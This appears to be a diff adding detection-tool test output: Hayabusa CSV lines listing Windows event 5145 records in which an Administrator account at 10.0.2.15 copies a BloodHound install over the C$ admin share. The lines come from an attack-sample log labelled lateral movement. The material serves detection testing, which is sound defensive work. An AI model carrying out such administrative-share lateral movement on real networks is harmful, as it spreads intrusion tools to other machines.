+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
